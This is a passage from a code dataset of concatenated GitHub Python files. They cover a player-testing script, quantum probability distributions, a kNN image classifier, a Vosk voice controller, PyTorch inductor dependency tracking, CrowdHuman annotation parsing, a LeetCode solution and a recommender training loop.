mapping[item['url']]:\n hosts_to_check.add(get_host(item['url']))\n urls_with_diff.append({'Url': item['url'], 'PlayerId': player_id})\n\n return urls_with_diff, hosts_to_check\n\n\ndef send_to_checker(faulty_hosts, incoming_directory_path):\n table = incoming_directory_path + '/clicks-crawling.' + str(int(time.time()))\n yt.write_table(table, [{'Host': host} for host in faulty_hosts])\n logging.info('Stored faulty hosts to {}'.format(table))\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n\n ap = argparse.ArgumentParser()\n ap.add_argument('--snail-results', required=True)\n ap.add_argument('--url-player-id-mapping', required=True)\n ap.add_argument('--check-incoming-directory', required=True)\n ap.add_argument('--output', required=True)\n args = ap.parse_args()\n\n snail_results = json.load(open(args.snail_results, 'r'))\n mapping = json.load(open(args.url_player_id_mapping, 'r'))\n\n faulty_urls, faulty_hosts = compare(snail_results, mapping)\n\n json.dump(faulty_urls, open(args.output, 'w'), indent=True)\n send_to_checker(faulty_hosts, args.check_incoming_directory)\n\n logging.info('Found {} URLs with unexpected players'.format(len(faulty_urls)))\n logging.info('{} hosts sent to checking'.format(len(faulty_hosts)))\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"extsearch/player_testing/clicks_crawling/compare-players.py","file_name":"compare-players.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70987928553","text":"import numpy as np\nimport prob as pr\nfrom info import coeffOfNo\n\ndef determBhv( dims, no=0):\n bhv = np.zeros( dims)\n bhv[ coeffOfNo( no, dims) ] = 1.0\n return bhv\n\ndef unifBhv( dims):\n bhv = np.ones( dims)\n bhv *= 1./np.sum( bhv)\n return bhv\n\ndef coin( p):\n return np.array( [p, 1.-p])\n\ndef randBhv( dims):\n bhv = np.random.rand( *dims)\n return pr.normalize( bhv)\n\n# Four partite distrib P_XYZU\ndef FourPDstrb():\n Ptable = np.zeros((4,4,2,2))\n Ptable[0,0,0,0] = Ptable[1,1,0,0] = Ptable[0,1,1,0] = Ptable[1,0,1,0] = 1.0/8.0\n Ptable[2,2,0,1] = Ptable[3,3,1,1] = 1.0/4.0\n return Ptable\n\n# Alternative implementation of the behavior above\ndef FourPDstrb2():\n P = np.zeros((4,4,2,2))\n for x in range(0,2):\n for y in range(0,2):\n P[x,y, (x+y)%2, x//2] = 1./8.\n for x in range(2,4):\n P[x, x, x%2, x//2] = 1./4.\n return P\n\ndef FourPDstrb3():\n P = np.zeros((4,4,16,2))\n for x in range(0,2):\n for y in range(0,2):\n P[x,y, (x+y)%2, x//2] = 1./8.\n for x in range(2,4):\n P[x, x, x%2, x//2] = 1./4.\n return P\n\ndef FourPDistribN(n=4):\n h = (n+1)//2\n P = np.zeros((n,n,h,h))\n for x in range(0,h):\n for y in range(0,h):\n P[x,y, (x+y)%h, x//h] = 1./(2*h*h)\n for x in range(h,n):\n P[x, x, x%h, x//h] = 1./n\n return P\n\ndef ThreePDstrb():\n P = np.zeros((4,4,16))\n for x in range(0,2):\n for y in range(0,2):\n P[x,y, (x+y)%2] = 1./8.\n for x in range(2,4):\n P[x, x, x%2] = 1./4.\n return P\n\ndef ThreePDstrbN(n=4):\n h = n//2\n P = np.zeros((n,n,n*n))\n for x in range(0,h):\n for y in range(0,h):\n P[x,y, (x+y)%h] = 1./(2*n*n)\n for x in range(h,n):\n P[x, x, x%h] = 1./n\n return P\n\n# Tripartite distribution given in Gisin, Wolf paper Example 3.bis\n# translated from \\psi = (1/sqrt(3))(|11> + |22> + |33>)\ndef ThreePDstrEx3(alpha=4):\n # for alpha <= 4 it seems that S(X;Y||Z) = 0\n # for alpha <= 3 I(X;Y|Z) = 0\n assert(alpha>=2)\n P = np.zeros(2,2,3)\n P[0,0,0] = P[1,1,0] = 2*(9/(2*alpha+4))\n P[0,0,2] = P[1,1,2] = alpha * 9/(2*alpha+4) * (2*alpha-5)/(2*alpha+4)\n P[1,0,0] = 2 * 2 * (2*alpha-5)/(2*alpha+4)\n P[1,0,1] = 5-alpha\n P[1,0,2] = alpha * (2*alpha-5)/(2*alpha+4) * (2*alpha-5)/(2*alpha+4)\n P[0,1,2] = alpha * 9/(2*alpha+4) * 9/(2*alpha+4)\n\n return pr.normalize(P)\n##########################################################\n\n# Four partite noise -> to be mixed with FourPDistrib\n# Is to yield as a marginal the candidate from 2003 paper\ndef ThreePNoise1():\n P = np.zeros((4,4,16))\n # Fill upper triangle\n for idx in [[0,2],[0,3],[1,2],[1,3]]:\n P[ idx[0], idx[1], idx[0]*4 + idx[1]] = 1\n P[ idx[1], idx[0], idx[1]*4 + idx[0]] = 1\n return pr.normalize(P)\n\ndef ThreePNoise1_():\n P = np.zeros((4,4,2))\n\n for idx in [[0,2],[0,3],[1,2],[1,3]]:\n P[ idx[0], idx[1], idx[0]%2] = 1\n P[ idx[1], idx[0], idx[1]%2] = 1\n return pr.normalize(P)\n\ndef ThreePNoise2():\n P = np.zeros((4,4,16))\n # Fill upper triangle\n for idx in [[0,0],[0,1],[1,0],[1,1],[0,2],[0,3],[1,2],[1,3]]:\n P[ idx[0], idx[1], idx[0]*4 + idx[1]] = 1\n P[ idx[1], idx[0], idx[1]*4 + idx[0]] = 1\n return pr.normalize(P)\n\ndef ThreePNoise2_():\n P = np.zeros((4,4,2))\n # Fill upper triangle\n for idx in [[0,0],[0,1],[1,0],[1,1],[0,2],[0,3],[1,2],[1,3]]:\n P[ idx[0], idx[1], idx[1]%2] = 1\n P[ idx[1], idx[0], idx[0]%2] = 1\n return pr.normalize(P) \n\ndef ThreePNoise3():\n P = np.zeros((4,4,16))\n for x in range(0, P.shape[0]):\n for y in range(0, P.shape[1]):\n P[ x, y, x*4 + y] = 1\n return pr.normalize(P) \n\ndef ThreePUniformNoise():\n P = np.ones((4,4,16))\n return pr.normalize(P)\n\ndef ThreePUniformNoise2():\n P = np.ones((4,4,2))\n return pr.normalize(P)\n\ndef redBhv(P):\n \"\"\"\n trace out all parties 4,5,.. so that only a tripartite\n behaviour is left\n \"\"\" \n l = len(P.shape)\n # t is () for l>=3\n t = tuple(np.arange(3,l))\n # np.sum does not change P for axis=()\n return np.sum(P,axis=t)\n","repo_name":"CrashingBrain/BSc_Project","sub_path":"coding/bhvs.py","file_name":"bhvs.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13329651396","text":"import os, glob\nimport cv2\nimport numpy as np\nimport time\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport csv\n\n\n\nclass data_preprocessing():\n def __init__(self, src_path, target_path,\n img_csv_name='img.csv', label_csv_name='label.csv'):\n\n self.src_path = src_path\n self.target_path = target_path\n self.img_csv_name = img_csv_name\n self.label_csv_name = label_csv_name\n\n # training data\n print('Preprocessing the training data...')\n self.create_des_csv_npz('train')\n\n # testing data\n print('Preprocessing the testing data...')\n self.create_des_csv_npz('test')\n\n def create_des_csv_npz(self, mode):\n # src path & target path\n cur_src_path = self.src_path + mode + '/'\n cur_target_path = self.target_path + mode + '/'\n if not os.path.exists(cur_target_path):\n os.makedirs(cur_target_path)\n\n print('Saving the ' + cur_target_path + self.img_csv_name)\n print('Saving the ' + cur_target_path + self.label_csv_name)\n\n # get all the dirs of labels\n dirs = glob.glob('{}*/'.format(cur_src_path))\n dirs.sort()\n\n # fps of csv\n fp_img = open(cur_target_path + self.img_csv_name, 'w')\n fp_label = open(cur_target_path + self.label_csv_name, 'w')\n\n # create csv & find all descriptor\n first = True\n\n for dir in dirs:\n label = dir[len(cur_src_path):-1]\n imgs = glob.glob('{}*.jpg'.format(dir + '/'))\n for img in imgs:\n fp_img.write(img[len(cur_src_path+label)+1:] + '\\n')\n fp_label.write(label + '\\n')\n\n fp_img.close()\n fp_label.close()\n\n\ndef tiny_img(img, size=(16, 16)):\n return cv2.resize(img, size, interpolation=cv2.INTER_AREA)\n\ndef compute_accuracy(y_pred, y_true):\n return np.sum(y_pred == y_true) / len(y_true)\n\ndef knn(train_img, train_label, test_img, test_label, k):\n correct = 0\n for img, label in zip(test_img, test_label):\n distances = pow(train_img - img, 2).sum(1) ** 0.5\n index = distances.argsort()\n neighbors = [train_label[idx] for idx in index[:k]]\n distances = [distances[idx] for idx in index[:k]]\n pred_label = get_label(neighbors, distances)\n if pred_label == label:\n correct += 1\n return correct * 100 / test_label.shape[0]\n\ndef get_label(neighbors, distances):\n labels = {}\n for label, distance in zip(neighbors, distances):\n if label in labels:\n labels[label] += 1. / distance\n else:\n labels[label] = 1. / distance\n return max(labels.keys(), key=(lambda key: labels[key]))\n\nif __name__ == '__main__':\n # Prepare Data\n src_path = './hw5_data/'\n target_path = './script/'\n pre_data = data_preprocessing(src_path, target_path)\n\n with open(os.path.join(target_path, 'train/img.csv'), newline='') as csvfile:\n train_img = list(csv.reader(csvfile))\n with open(os.path.join(target_path, 'train/label.csv'), newline='') as csvfile:\n train_label = list(csv.reader(csvfile))\n with open(os.path.join(target_path, 'test/img.csv'), newline='') as csvfile:\n test_img = list(csv.reader(csvfile))\n with open(os.path.join(target_path, 'test/label.csv'), newline='') as csvfile:\n test_label = list(csv.reader(csvfile))\n\n n_train_data = len(train_img)\n\n imgs = []\n for path, label in zip(train_img, train_label):\n img = cv2.imread(os.path.join(src_path, 'train', label[0], path[0]), 0)\n img = tiny_img(img)\n imgs.append(img)\n\n x_train = np.array(imgs).reshape((n_train_data, -1))\n y_train = np.array(train_label).reshape((n_train_data, ))\n\n n_test_data = len(test_img)\n\n imgs = []\n for path, label in zip(test_img, test_label):\n img = cv2.imread(os.path.join(src_path, 'test', label[0], path[0]), 0)\n img = tiny_img(img)\n imgs.append(img)\n\n x_test = np.array(imgs).reshape((n_test_data, -1))\n y_test = np.array(test_label).reshape((n_test_data, ))\n\n print(\"{:^3} | {:^10}\".format(\"K\", \"Test Acc\"))\n print('-' * 15)\n for k in range(1, 30+1):\n test_acc = knn(x_train, y_train, x_test, y_test, k)\n print(\"{:^3} | {:^10}\".format(k, \"%.4f\"%test_acc))\n\n","repo_name":"yu2guang/NCTU-CS","sub_path":"Computer-Vision/HW5-Classifier/tiny_images_with_knn.py","file_name":"tiny_images_with_knn.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41548477518","text":"from vosk import Model, KaldiRecognizer\nimport os\nimport pyaudio\nimport json\n\nimport controller_som\n\nlado_atual = 'direita'\n\nmodel = Model('..\\model')\nrec = KaldiRecognizer(model, 16000)\n\np = pyaudio.PyAudio()\nstream = p.open(format=pyaudio.paInt16, channels=1, rate=16000, input=True, frames_per_buffer=8000)\nstream.start_stream()\na = ''\n\nprint('******************INICIO**********************\\n')\nwhile True:\n data = stream.read(8000) #4000\n '''if len(data) == 0:\n break'''\n if rec.AcceptWaveform(data):\n #a = rec.Result()\n d = json.loads(rec.Result())['text']\n #d['text']\n print(d)\n if len(d) > 0:\n lado_atual = controller_som.controlar(d, lado_atual)\n \n if d in ['encerrado', 'encerrar','encerra','sérra', 'serra']:\n break\n\nprint(rec.FinalResult())","repo_name":"ErikJhones/voice-controller","sub_path":"str/som.py","file_name":"som.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14825740629","text":"import collections\nimport dataclasses\nimport itertools\nimport logging\nimport re\nimport typing\nfrom typing import Any, Callable, Dict, List, Optional, Set, Tuple, Union\n\nimport sympy\n\nimport torch\nfrom torch.fx.experimental.symbolic_shapes import free_unbacked_symbols\n\nfrom .codegen.common import index_prevent_reordering\nfrom .utils import get_dtype_size, sympy_str, sympy_subs, sympy_symbol, VarRanges\nfrom .virtualized import V\n\nlog = logging.getLogger(__name__)\nis_indirect = re.compile(r\"indirect|tmp\").search\nDep = Union[\"MemoryDep\", \"StarDep\", \"WeakDep\"]\n\n\nclass MemoryDep(typing.NamedTuple):\n name: str\n index: sympy.Expr # type: ignore[assignment]\n var_names: Tuple[sympy.Symbol, ...]\n size: Tuple[sympy.Expr, ...]\n\n def __repr__(self):\n return f\"MemoryDep({self.name!r}, {self.index}, {self.ranges})\"\n\n @property\n def ranges(self) -> Dict[sympy.Symbol, sympy.Expr]:\n \"\"\"{c0: 128, c1: 512, ...}\"\"\"\n return dict(zip(self.var_names, self.size))\n\n def get_numel(self) -> sympy.Expr:\n if self.is_indirect():\n numel = V.graph.get_numel(self.name)\n else:\n vars = set(self.index.free_symbols)\n numel = sympy.Integer(1)\n for var, size in zip(self.var_names, self.size):\n if var in vars:\n numel = numel * size\n return numel\n\n def rename(self, renames: Dict[str, str]) -> \"MemoryDep\":\n if self.name in renames:\n return MemoryDep(\n renames[self.name], self.index, var_names=self.var_names, size=self.size\n )\n return self\n\n def numbytes_hint(self):\n return V.graph.sizevars.size_hint(self.get_numel()) * get_dtype_size(\n V.graph.get_dtype(self.name)\n )\n\n def has_unbacked_symbols(self):\n return len(free_unbacked_symbols(self.get_numel())) > 0\n\n def is_contiguous(self) -> bool:\n return isinstance(self.index, sympy.Symbol) and self.index in self.var_names\n\n def is_scalar(self) -> bool:\n if isinstance(self.index, sympy.Symbol):\n return self.index not in self.var_names and not self.is_indirect()\n return isinstance(self.index, (int, sympy.Integer))\n\n def is_indirect(self) -> bool:\n return any(is_indirect(v.name) for v in self.index.free_symbols)\n\n\nclass StarDep(typing.NamedTuple):\n # depends on the entire buffer\n name: str\n\n @property\n def index(self):\n raise NotImplementedError(\"StarDep does not have an index\")\n\n def get_numel(self) -> sympy.Expr:\n return V.graph.get_numel(self.name)\n\n def rename(self, renames: Dict[str, str]) -> \"StarDep\":\n if self.name in renames:\n return StarDep(renames[self.name])\n return self\n\n def numbytes_hint(self):\n return V.graph.sizevars.size_hint(self.get_numel()) * get_dtype_size(\n V.graph.get_dtype(self.name)\n )\n\n def has_unbacked_symbols(self):\n return len(free_unbacked_symbols(self.get_numel())) > 0\n\n def is_contiguous(self) -> bool:\n return False\n\n def is_scalar(self) -> bool:\n return False\n\n def is_indirect(self) -> bool:\n return False\n\n\n# Used for tracking mutation ordering\n# if A reads a buffer and B mutates it\n# B must be ordered after A\n#\n# It is weak because if it turns out A's read is never used, we can still\n# eliminate it\nclass WeakDep(typing.NamedTuple):\n name: str\n\n @property\n def index(self):\n raise NotImplementedError(\"WeakDep does not have an index\")\n\n def get_numel(self) -> sympy.Expr:\n return sympy.Integer(1)\n\n def rename(self, renames: Dict[str, str]) -> \"WeakDep\":\n if self.name in renames:\n return WeakDep(renames[self.name])\n return self\n\n def numbytes_hint(self):\n return 1 # Purely inserted for ordering, not an actual dep\n\n def has_unbacked_symbols(self):\n return False\n\n def is_contiguous(self) -> bool:\n return False\n\n\nclass IndexExprDep(typing.NamedTuple):\n index: sympy.Expr # type: ignore[assignment]\n var_names: Tuple[sympy.Symbol, ...]\n size: Tuple[sympy.Expr, ...]\n\n\n@dataclasses.dataclass\nclass ReadWrites:\n reads: Set[Dep]\n writes: Set[Dep]\n index_exprs: Set[IndexExprDep]\n range_vars: Optional[List[sympy.Expr]] = None\n var_ranges: Optional[VarRanges] = None\n op_counts: typing.Counter[str] = dataclasses.field(\n default_factory=collections.Counter\n )\n\n def rename(self, renames: typing.Dict[str, str]) -> \"ReadWrites\":\n return ReadWrites(\n {dep.rename(renames) for dep in self.reads},\n {dep.rename(renames) for dep in self.writes},\n self.index_exprs,\n self.range_vars,\n self.var_ranges,\n op_counts=self.op_counts,\n )\n\n def with_read(self, dep: Dep) -> \"ReadWrites\":\n assert isinstance(dep, (WeakDep, StarDep))\n return ReadWrites(\n set.union(self.reads, {dep}),\n self.writes,\n self.index_exprs,\n self.range_vars,\n self.var_ranges,\n op_counts=self.op_counts,\n )\n\n def merge(self, other: \"ReadWrites\"):\n reads = set.union(self.reads, other.reads)\n writes = set.union(self.writes, other.writes)\n index_exprs = set.union(self.index_exprs, other.index_exprs)\n op_counts = collections.Counter(self.op_counts)\n op_counts.update(other.op_counts)\n return ReadWrites(reads - writes, writes, index_exprs, op_counts=op_counts)\n\n @staticmethod\n def merge_list(read_writes: List[\"ReadWrites\"]):\n all_writes = set.union(*[rw.writes for rw in read_writes])\n all_reads = set.union(*[rw.reads for rw in read_writes]) - all_writes\n all_index_exprs = set.union(*[rw.index_exprs for rw in read_writes])\n\n op_counts: typing.Counter[Any] = collections.Counter()\n for rw in read_writes:\n op_counts.update(rw.op_counts)\n\n return ReadWrites(all_reads, all_writes, all_index_exprs, op_counts=op_counts)\n\n def remove_reads(self, rem_reads):\n return ReadWrites(\n self.reads - rem_reads,\n self.writes,\n self.index_exprs,\n self.range_vars,\n self.var_ranges,\n op_counts=self.op_counts,\n )\n\n def reads_and_writes(self):\n return itertools.chain(self.reads, self.writes)\n\n\nclass _RecordLoadStoreInner(V.MockHandler): # type: ignore[name-defined]\n def __init__(self, var_ranges: VarRanges, normalize: bool):\n super().__init__()\n self._reads: Set[MemoryDep] = set()\n self._writes: Set[MemoryDep] = set()\n self._index_exprs: Set[IndexExprDep] = set()\n self._var_ranges: VarRanges = var_ranges\n self._normalize: bool = normalize\n\n def canonicalize(\n self, index: sympy.Expr\n ) -> Tuple[sympy.Expr, Tuple[sympy.Expr, ...]]:\n if not self._normalize:\n sizes = [V.graph.sizevars.simplify(x) for x in self._var_ranges.values()]\n var_names = tuple(\n k for k, v in zip(self._var_ranges.keys(), sizes) if v != 1\n )\n sizes = tuple(v for v in sizes if v != 1)\n return index, var_names, sizes # type: ignore[return-value]\n\n # Try to further simplify the indexes even if simplify_loops didn't\n # convert it to the simplest form because of the interference from\n # different indexing formulas.\n free_symbols = index.free_symbols\n var_ranges = {\n k: V.graph.sizevars.simplify(v)\n for k, v in self._var_ranges.items()\n # TODO(jansel): explore this further normalization\n # if k in free_symbols\n }\n index_vars = [*var_ranges.keys()]\n sizes = [*var_ranges.values()] # type: ignore[assignment]\n new_sizes, reindex, prune = V.graph.sizevars._simplify_loops(\n index_vars,\n sizes,\n index_prevent_reordering([index], index_vars, sizes),\n )\n\n # assign new variables each dimension to deal with numbering mismatches\n # d0, d1, d2 could become d0, d2 -- which won't match d0, d1\n new_vars, add_var = var_builder(canonicalization_prefix())\n replacement = dict(zip(index_vars, reindex([add_var(x) for x in new_sizes])))\n index = sympy_subs(sympy.expand(index), replacement)\n\n new_vars = [*new_vars.keys()]\n new_sizes = [*new_sizes]\n free_symbols = index.free_symbols\n while new_vars and new_vars[-1] not in free_symbols:\n # Reduction has last (reduced) dim in its sizes, but\n # downstream users won't. Normalize this away.\n new_vars.pop()\n new_sizes.pop()\n return index, tuple(new_vars), tuple(new_sizes) # type: ignore[return-value]\n\n def load(self, name: str, index: sympy.Expr) -> str:\n self._reads.add(MemoryDep(name, *self.canonicalize(index))) # type: ignore[call-arg]\n return f\"load({name}, {sympy_str(index)})\"\n\n def load_seed(self, name: str, index: int):\n assert isinstance(index, int)\n return self.load(name, sympy.Integer(index))\n\n def store(self, name: str, index: sympy.Expr, value: str, mode=None) -> str:\n self._writes.add(MemoryDep(name, *self.canonicalize(index))) # type: ignore[call-arg]\n return f\"store({name}, {sympy_str(index)}, {value}, {mode})\"\n\n def store_reduction(self, name: str, index, value) -> str:\n return self.store(name, index, f\"store_reduction({value})\")\n\n def index_expr(self, index: sympy.Expr, dtype) -> str:\n self._index_exprs.add(IndexExprDep(*self.canonicalize(index))) # type: ignore[call-arg]\n return f\"index_expr({sympy_str(index)}, {dtype})\"\n\n def bucketize(\n self,\n values,\n offsets_name: str,\n offsets_size: sympy.Expr,\n indexing_dtype: torch.dtype,\n right: bool,\n ):\n self._reads.add(StarDep(offsets_name)) # type: ignore[arg-type]\n return f\"bucketize({values}, {offsets_name}, {sympy_str(offsets_size)}, {indexing_dtype}, {right})\"\n\n\nclass _OpCounter:\n \"\"\"Shim to count how many times each op is used\"\"\"\n\n def __init__(self, inner):\n super().__init__()\n self.parent_handler = inner\n self._op_counts: typing.Counter[Any] = collections.Counter()\n\n def __getattr__(self, name):\n self._op_counts[name] += 1\n return getattr(self.parent_handler, name)\n\n\nclass RecordLoadStore(V.KernelFormatterHandler): # type: ignore[name-defined]\n def __init__(self, var_ranges: VarRanges, normalize: bool):\n parent_handler = _RecordLoadStoreInner(\n var_ranges=var_ranges, normalize=normalize\n )\n parent_handler = _OpCounter(parent_handler)\n super().__init__(parent_handler=parent_handler)\n\n\ndef var_builder(prefix: str) -> Tuple[VarRanges, Callable[[sympy.Expr], sympy.Symbol]]:\n cnt = itertools.count()\n var_ranges: VarRanges = dict()\n\n def add_var(length: sympy.Expr) -> sympy.Symbol:\n v = sympy_symbol(f\"{prefix}{next(cnt)}\")\n var_ranges[v] = length\n return v\n\n return var_ranges, add_var\n\n\ndef index_vars_no_squeeze(*argsizes: Tuple[sympy.Expr, ...], prefix: str):\n var_ranges, add_var = var_builder(prefix)\n args: List[List[sympy.Symbol]] = []\n for size in argsizes:\n args.append(list(map(add_var, size)))\n return args, var_ranges\n\n\ndef index_vars_squeeze(*argsizes: Tuple[sympy.Expr, ...], prefix: str = \"d\"):\n from .ir import SqueezeView\n\n var_ranges, add_var = var_builder(prefix)\n args: List[List[sympy.Expr]] = []\n new_sizes: List[List[sympy.Expr]] = []\n for size in argsizes:\n new_size, reindex = SqueezeView.squeezer(size)\n new_sizes.append(new_size)\n args.append(reindex(list(map(add_var, new_size))))\n return args, var_ranges\n\n\ndef extract_read_writes(\n fn: Callable[..., Any],\n *argsizes: Tuple[sympy.Expr, ...],\n normalize: bool = False,\n prefix: str = \"d\",\n):\n args, var_ranges = index_vars_squeeze(*argsizes, prefix=prefix)\n rw = RecordLoadStore(var_ranges, normalize=normalize)\n with V.set_ops_handler(rw): # type: ignore[call-arg]\n fn(*args)\n\n if normalize:\n range_vars = [] # Number of vars could differ due to normalization\n else:\n range_vars = [*itertools.chain(*args)]\n\n inner = rw.parent_handler.parent_handler\n return ReadWrites(\n set(inner._reads),\n set(inner._writes),\n inner._index_exprs,\n range_vars,\n var_ranges,\n rw.parent_handler._op_counts,\n )\n\n\ndef extract_input_node_reduction_ranges( # noqa: F722\n input_node: \".ir.TensorBox\", # type: ignore[valid-type] # noqa: F722\n) -> Tuple[Optional[List[sympy.Expr]], Optional[List[sympy.Expr]]]:\n \"\"\"\n Returns the size and reduction size of all inputs, if the sizes and reduction_sizes (if exist) are all the same.\n It's possible that a node has multiple inputs, some are Reduction nodes and others are Pointwise nodes.\n In this case, reduction_sizes of the Reduction nodes need to be the same.\n Otherwise returns (None, None).\n \"\"\"\n\n from .ir import ComputedBuffer, Loops\n\n if isinstance(input_node.data, ComputedBuffer):\n # Input node has already been realized. Return its size and reduction_size.\n size = input_node.get_size()\n reduction_size = input_node.get_reduction_size()\n if len(reduction_size) > 0:\n return (size, reduction_size)\n else:\n return (None, None)\n\n if not isinstance(input_node.data.data, Loops):\n # Other IRNodes do not have reduction_ranges.\n return (None, None)\n\n # There is one issue: what if there are views / permutations between the input node and its dependent realized nodes?\n # The current method still uses reduction ranges from the dependent realized node, which is not ideal.\n # Is there a way to check whether there are permutations inbetween?\n reads = input_node.get_reads()\n reduction_size = None\n size = None\n for read in reads:\n if not isinstance(read, MemoryDep):\n continue\n buffer = V.graph.get_buffer(read.name)\n if buffer is None:\n continue\n if isinstance(buffer, ComputedBuffer) and len(buffer.get_reduction_size()) > 0:\n if reduction_size is None:\n reduction_size = buffer.get_reduction_size()\n size = buffer.get_size()\n elif (\n reduction_size != buffer.get_reduction_size()\n or size != buffer.get_size()\n ):\n return (None, None)\n return (size, reduction_size)\n\n\ndef canonicalization_prefix():\n return \"c\"\n","repo_name":"pytorch/pytorch","sub_path":"torch/_inductor/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":14799,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"12762330218","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\"\"\"\n##############################\n### CrowdHuman Processing ###\n#############################\n\"\"\"\nimport json\nimport argparse\n\nimport os.path as osp\nfrom tqdm import tqdm\n\nparser = argparse.ArgumentParser(description='Create training txt file for SCUT-HEAD')\nparser.add_argument('--base_dir', help='Path to the root directory of the dataset')\nparser.add_argument('--save_prepend', help='Places where files for detection are saved')\nargs = parser.parse_args()\n\ndef parse_odgt(base_dir, save_prepend, fname):\n out_list = []\n chuman_wh_list = []\n\n with open(osp.join(base_dir, fname), 'r') as odt_f:\n for images in tqdm(odt_f.readlines()):\n s_det = json.loads(images)\n cur_imname = s_det.get('ID') + '.jpg'\n fname = \"#\" + save_prepend + cur_imname\n out_list.append(fname)\n# cur_boxes = [gt_box['hbox'] for gt_box in s_det['gtboxes'] \n# if bool(gt_box.get('head_attr', None))]\n for gt_box in s_det['gtboxes']:\n ignore_label = 0\n is_mask = gt_box.get('tag')\n head_attr = gt_box.get('head_attr', None)\n if not bool(head_attr):\n continue\n if is_mask == 'mask':\n ignore_label = -1\n ignore_cond = head_attr.get('ignore') == 1\n if ignore_cond:\n ignore_label = -1\n (startX, startY, W, H) = gt_box['hbox']\n chuman_wh_list.append([W, H])\n endX, endY = startX+W, startY+H\n new_coord = [startX, startY, endX, endY, ignore_label]\n new_line = \" \".join(str(x) for x in new_coord)\n out_list.append(new_line)\n \n return out_list\n\ndef write_out(out_file, lines):\n with open(out_file, 'w+') as of:\n for new_line in tqdm(lines):\n of.write(\"%s\\n\" % new_line)\n\nif __name__ == '__main__':\n im_dir = osp.join(args.base_dir, 'Images')\n train_out = osp.join(args.base_dir, 'CHuman_Train.txt')\n val_out = osp.join(args.base_dir, 'CHuman_Valid.txt')\n train_lines = parse_odgt(args.base_dir, args.save_prepend, 'annotation_train.odgt')\n val_lines = parse_odgt(args.base_dir, args.save_prepend, 'annotation_val.odgt')\n write_out(train_out, train_lines)\n write_out(val_out, val_lines)","repo_name":"Sentient07/HeadHunter","sub_path":"head_detection/data/create_chuman.py","file_name":"create_chuman.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"72"} +{"seq_id":"70287359912","text":"#\n# @lc app=leetcode id=125 lang=python3\n#\n# [125] Valid Palindrome\n#\n\n# @lc code=start\nclass Solution:\n def isPalindrome(self, s: str) -> bool:\n sLower = s.lower()\n\n sAlphaNum = \"\"\n for ch in sLower:\n if ch.isalnum():\n sAlphaNum += ch\n\n print(sAlphaNum)\n\n startPtr, endPtr = 0, len(sAlphaNum) - 1\n while endPtr > startPtr:\n # Return early as soon as a non-match is detected\n if sAlphaNum[startPtr] != sAlphaNum[endPtr]:\n return False\n\n startPtr += 1\n endPtr -= 1\n\n return True\n\n\n# @lc code=end\n","repo_name":"MegaBlackLabel/leetcode","sub_path":"125.valid-palindrome.py","file_name":"125.valid-palindrome.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18191708036","text":"import time\nimport torch\nimport numpy as np\nimport argparse\nimport random\nfrom models import PERIS\nfrom metric import cal_measures\nfrom dataloaders.dataloader import DataLoader\n\ntorch.set_num_threads(1)\n\nrandom.seed(2022)\nnp.random.seed(2022)\ntorch.manual_seed(2022)\n\nclass Instructor:\n def __init__(self, opt):\n self.opt = opt \n\n self.data_loader = DataLoader(self.opt) \n\n self.trn_loader, self.vld_loader, self.tst_loader = self.data_loader.get_loaders()\n \n opt.numuser = self.trn_loader.dataset.numuser\n opt.numitem = self.trn_loader.dataset.numitem\n self.model = self.opt.model_class(self.opt).cuda()\n \n self._print_args()\n \n def train(self): \n \n optimizer = torch.optim.Adam(filter(lambda p: p.requires_grad, self.model.parameters()), lr=self.opt.learning_rate, weight_decay=opt.l2reg)\n \n best_score = -1 \n best_topHits, best_topNdcgs = None, None\n batch_loss = 0\n batch_loss_aux = 0\n c = 0 # to check early stopping\n \n for epoch in range(self.opt.num_epoch):\n st = time.time()\n \n for i, batch_data in enumerate(self.trn_loader):\n batch_data = [bd.cuda() for bd in batch_data] \n optimizer.zero_grad() \n\n if epoch < self.opt.warmup_epochs:\n loss = self.model.compute_warmup_loss(batch_data) \n else:\n loss, loss_IS = self.model.compute_loss(batch_data) \n\n loss.backward()\n \n optimizer.step()\n \n batch_loss += loss.data.item()\n \n if epoch>=self.opt.warmup_epochs:\n batch_loss_aux += loss_IS.data.item()\n\n elapsed = time.time() - st\n evalt = time.time()\n \n with torch.no_grad():\n topHits, topNdcgs = cal_measures(self.vld_loader, self.model, opt, 'vld')\n \n if (topHits[10] + topNdcgs[10])/2 > best_score:\n best_score = (topHits[10] + topNdcgs[10])/2\n \n best_topHits = topHits\n best_topNdcgs = topNdcgs\n \n c = 0\n \n test_topHits, test_topNdcgs = cal_measures(\n self.tst_loader, self.model, opt, 'tst') \n\n evalt = time.time() - evalt \n \n print(('(%.1fs, %.1fs)\\tEpoch [%d/%d], TRN_ERR : %.4f, TRN_IS_ERR : %.4f, v_score : %5.4f, tHR@10 : %5.4f'% (elapsed, evalt, epoch, self.opt.num_epoch, batch_loss/len(self.trn_loader), batch_loss_aux/len(self.trn_loader), (topHits[10] + topNdcgs[10])/2, test_topHits[10])))\n\n batch_loss = 0\n batch_loss_aux = 0\n\n c += 1\n\n if epoch < self.opt.warmup_epochs:\n c = 0 # don't count patient during warm-up steps \n \n if c > 5: break # Early-stopping\n \n print(('\\nValid score@10 : %5.4f, HR@10 : %5.4f, NDCG@10 : %5.4f\\n'% (((best_topHits[10] + best_topNdcgs[10])/2), best_topHits[10], best_topNdcgs[10])))\n \n return test_topHits, test_topNdcgs\n \n def 